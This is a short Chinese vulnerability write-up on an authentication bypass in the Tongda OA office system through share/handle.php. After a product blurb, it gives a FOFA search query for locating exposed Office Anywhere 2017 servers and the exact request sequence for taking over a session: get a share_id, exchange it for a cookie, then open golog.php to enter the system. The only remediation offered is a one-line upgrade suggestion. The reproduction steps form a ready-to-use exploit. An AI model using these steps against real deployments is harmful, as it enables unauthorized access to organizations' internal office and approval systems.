1 产品简介
通达OA(Office Anywhere网络智能办公系统)是由通达信科科技自主研发的协同办公自动化软件,是与中国企业管理实践相结合形成的综合管理办公平台。通达OA为各行业不同规模的众多用户提供信息化管理能力,包括流程审批、行政办公、日常事务、数据统计分析、即时通讯、移动办公等,帮助广大用户降低沟通和管理成本,提升生产和决策效率。
2 漏洞描述
通达OA(Office Anywhere网络智能办公系统)存在share/handle.php身份认证绕过漏洞。攻击者可以通过构造share/handle.php获取敏share_id,使用/share/index.php?share_id={share_id}获取cookie并访问/general/golog.php?version=ie6进入系统。
3 产品主页
4 漏洞复现
fofa搜索:body=“Office Anywhere 2017版”
访问下面的路径
/share/handle.php?module=2&module_id=1
使用share_id拼接地址,获取cookie
/share/index.php?share_id=9F6A2EE3-D2FC-11D9-BC11-D2A353F04E88
查看浏览器中是否存在Cookie
使用下面的路径拼接到地址中直接访问
/general/golog.php?version=ie6
5 修复建议
建议联系软件厂商进行升级处理。